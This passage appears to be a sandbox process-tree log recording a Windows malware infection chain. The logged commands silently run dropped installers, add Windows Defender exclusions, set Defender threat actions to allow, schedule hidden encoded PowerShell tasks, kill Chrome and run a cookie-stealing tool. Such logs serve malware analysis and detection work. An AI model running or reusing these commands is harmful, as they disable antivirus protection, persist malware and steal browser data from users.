PID:17376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jmjmtrox.ohj\setup.exe /S /kr /site_id=754 & exit
11⤵
PID:17392

C:\Users\Admin\AppData\Local\Temp\jmjmtrox.ohj\setup.exe
C:\Users\Admin\AppData\Local\Temp\jmjmtrox.ohj\setup.exe /S /kr /site_id=754
12⤵
PID:17668

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
13⤵
PID:18100

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
14⤵
PID:18176

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
15⤵
PID:18212

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
15⤵
PID:18272

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggmEgTpmp" /SC once /ST 04:30:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
13⤵
- Creates scheduled task(s)
PID:2804

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggmEgTpmp"
13⤵
PID:4140

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggmEgTpmp"
13⤵
PID:6272

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\sSwJdpx.exe\" nh /site_id 754 /S" /V1 /F
13⤵
- Creates scheduled task(s)
PID:6420

C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\hjjgaa.exe" /Verysilent
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:10556

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:10696

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:15064

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:17764

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:17848

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4212

C:\Users\Admin\AppData\Local\Temp\is-DG475.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DG475.tmp\Setup3310.tmp" /SL5="$20358,138429,56832,C:\Users\Admin\AppData\Local\Temp\2upvxsnyzss\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:4780

C:\Users\Admin\AppData\Local\Temp\is-5LITL.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5LITL.tmp\Setup.exe" /Verysilent
2⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\is-ALJGT.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ALJGT.tmp\Setup.tmp" /SL5="$9029A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-5LITL.tmp\Setup.exe" /Verysilent
3⤵
PID:6176

C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\Delta.exe" /Verysilent
4⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\is-8BVRO.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8BVRO.tmp\Delta.tmp" /SL5="$20484,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\Delta.exe" /Verysilent
5⤵
PID:6424

C:\Users\Admin\AppData\Local\Temp\is-C3JKO.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-C3JKO.tmp\Setup.exe" /VERYSILENT
6⤵
PID:10320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-C3JKO.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:11420

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
8⤵
- Kills process with taskkill
PID:11604

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:11672

C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\PictureLAb.exe" /Verysilent
4⤵
PID:10356

C:\Users\Admin\AppData\Local\Temp\is-FUN0P.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FUN0P.tmp\PictureLAb.tmp" /SL5="$30484,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\PictureLAb.exe" /Verysilent
5⤵
PID:10388

C:\Users\Admin\AppData\Local\Temp\is-8TCF3.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-8TCF3.tmp\Setup.exe" /VERYSILENT
6⤵
PID:8480

C:\Users\Admin\AppData\Local\Temp\is-277LS.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-277LS.tmp\Setup.tmp" /SL5="$602B8,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-8TCF3.tmp\Setup.exe" /VERYSILENT
7⤵
PID:8652

C:\Users\Admin\AppData\Local\Temp\is-C5R0G.tmp\HGT.exe
"C:\Users\Admin\AppData\Local\Temp\is-C5R0G.tmp\HGT.exe" /S /UID=lab214
8⤵
PID:10596

C:\Users\Admin\AppData\Local\Temp\b8-a8d5e-ec3-94eb3-bc538509b4545\Qaecybileco.exe
"C:\Users\Admin\AppData\Local\Temp\b8-a8d5e-ec3-94eb3-bc538509b4545\Qaecybileco.exe"
9⤵
PID:11336

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ohjr3boo.m5c\gaooo.exe & exit
10⤵
PID:10636

C:\Users\Admin\AppData\Local\Temp\ohjr3boo.m5c\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\ohjr3boo.m5c\gaooo.exe
11⤵
PID:12016

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:12184

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:15032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\edm4jsfw.5l4\md7_7dfj.exe & exit
10⤵
PID:6212

C:\Users\Admin\AppData\Local\Temp\edm4jsfw.5l4\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\edm4jsfw.5l4\md7_7dfj.exe
11⤵
PID:4476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b2f3bbtk.xyy\askinstall29.exe & exit
10⤵
PID:2352

C:\Users\Admin\AppData\Local\Temp\b2f3bbtk.xyy\askinstall29.exe
C:\Users\Admin\AppData\Local\Temp\b2f3bbtk.xyy\askinstall29.exe
11⤵
PID:10152

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
12⤵
PID:10632

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
13⤵
- Kills process with taskkill
PID:10848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ra51blql.jgr\customer4.exe & exit
10⤵
PID:12432

C:\Users\Admin\AppData\Local\Temp\ra51blql.jgr\customer4.exe
C:\Users\Admin\AppData\Local\Temp\ra51blql.jgr\customer4.exe
11⤵
PID:12672

C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
12⤵
PID:13376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahrmgzth.nzf\HookSetp.exe & exit
10⤵
PID:12852

C:\Users\Admin\AppData\Local\Temp\ahrmgzth.nzf\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\ahrmgzth.nzf\HookSetp.exe
11⤵
PID:13096

C:\ProgramData\2407718.26
"C:\ProgramData\2407718.26"
12⤵
PID:13948

C:\ProgramData\1122819.12
"C:\ProgramData\1122819.12"
12⤵
PID:14012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jbvqggae.bfu\GcleanerWW.exe /mixone & exit
10⤵
PID:12928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe & exit
10⤵
PID:13280

C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe
11⤵
PID:17884

C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\vhit22jh.yfc\privacytools5.exe
12⤵
PID:13908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4t4bgmub.dum\setup.exe /8-2222 & exit
10⤵
PID:13728

C:\Users\Admin\AppData\Local\Temp\4t4bgmub.dum\setup.exe
C:\Users\Admin\AppData\Local\Temp\4t4bgmub.dum\setup.exe /8-2222
11⤵
PID:11696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lingering-Violet"
12⤵
PID:14248

C:\Program Files (x86)\Lingering-Violet\7za.exe
"C:\Program Files (x86)\Lingering-Violet\7za.exe" e -p154.61.71.51 winamp-plugins.7z
12⤵
PID:16128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Lingering-Violet\setup.exe" -map "C:\Program Files (x86)\Lingering-Violet\WinmonProcessMonitor.sys""
12⤵
PID:5856

C:\Program Files (x86)\Lingering-Violet\setup.exe
"C:\Program Files (x86)\Lingering-Violet\setup.exe" -map "C:\Program Files (x86)\Lingering-Violet\WinmonProcessMonitor.sys"
13⤵
PID:5832

C:\Program Files (x86)\Lingering-Violet\7za.exe
"C:\Program Files (x86)\Lingering-Violet\7za.exe" e -p154.61.71.51 winamp.7z
12⤵
PID:7648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ik0pmwur.3yt\MultitimerFour.exe & exit
10⤵
PID:11688

C:\Users\Admin\AppData\Local\Temp\ik0pmwur.3yt\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\ik0pmwur.3yt\MultitimerFour.exe
11⤵
PID:14244

C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
12⤵
PID:14920

C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe" 1 3.1616085601.605382614a8e4 104
13⤵
PID:8296

C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\YVHFI4ES6W\multitimer.exe" 2 3.1616085601.605382614a8e4
14⤵
PID:17032

C:\Users\Admin\AppData\Local\Temp\timn2vktyss\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\timn2vktyss\askinstall24.exe"
15⤵
PID:4992

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
16⤵
PID:17904

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
17⤵
- Kills process with taskkill
PID:5896

C:\Users\Admin\AppData\Local\Temp\mkyk2io5pdu\vict.exe
"C:\Users\Admin\AppData\Local\Temp\mkyk2io5pdu\vict.exe" /VERYSILENT /id=535
15⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\is-G2B67.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G2B67.tmp\vict.tmp" /SL5="$603EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\mkyk2io5pdu\vict.exe" /VERYSILENT /id=535
16⤵
PID:18020

C:\Users\Admin\AppData\Local\Temp\is-HD1G8.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-HD1G8.tmp\wimapi.exe" 535
17⤵
PID:17996

C:\Users\Admin\AppData\Local\Temp\uhknkababmw\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\uhknkababmw\Setup3310.exe" /Verysilent /subid=577
15⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\is-CGU5H.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CGU5H.tmp\Setup3310.tmp" /SL5="$803C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\uhknkababmw\Setup3310.exe" /Verysilent /subid=577
16⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\is-CMNDN.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-CMNDN.tmp\Setup.exe" /Verysilent
17⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\is-TEDIQ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TEDIQ.tmp\Setup.tmp" /SL5="$3056C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-CMNDN.tmp\Setup.exe" /Verysilent
18⤵
PID:6432

C:\Users\Admin\AppData\Local\Temp\eafxssbeay0\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\eafxssbeay0\AwesomePoolU1.exe"
15⤵
PID:4752

C:\Users\Admin\AppData\Local\Temp\f3bcgbntwu0\2jxl2u4oaxm.exe
"C:\Users\Admin\AppData\Local\Temp\f3bcgbntwu0\2jxl2u4oaxm.exe" /ustwo INSTALL
15⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\2ZUCV9IULM\setups.exe
"C:\Users\Admin\AppData\Local\Temp\2ZUCV9IULM\setups.exe" ll
12⤵
PID:8572

C:\Users\Admin\AppData\Local\Temp\is-0LI7B.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0LI7B.tmp\setups.tmp" /SL5="$704DE,549376,61440,C:\Users\Admin\AppData\Local\Temp\2ZUCV9IULM\setups.exe" ll
13⤵
PID:14636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u5f24ikr.yoc\setup.exe /S /kr /site_id=754 & exit
10⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\u5f24ikr.yoc\setup.exe
C:\Users\Admin\AppData\Local\Temp\u5f24ikr.yoc\setup.exe /S /kr /site_id=754
11⤵
PID:15132

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
12⤵
PID:15588

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
13⤵
PID:14972

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
14⤵
PID:16044

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
14⤵
PID:15816

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gGgvEfWam" /SC once /ST 03:08:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
12⤵
- Creates scheduled task(s)
PID:17252

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gGgvEfWam"
12⤵
PID:17808

C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-5IJNL.tmp\hjjgaa.exe" /Verysilent
4⤵
PID:11372

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:11612

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:10108

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5324

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5848

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7380

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7576

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:7636

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1a099d32-b6ae-7d47-be89-332701aff930}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:7684

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"
2⤵
PID:7804

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\sSwJdpx.exe
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\sSwJdpx.exe nh /site_id 754 /S
1⤵
PID:7764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:6232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:8936

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:8996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:9136

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:9180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:9212

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:9236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:9272

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:9288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:9308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:9332

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:9360

C:\Windows\SysWOW64\reg.exe
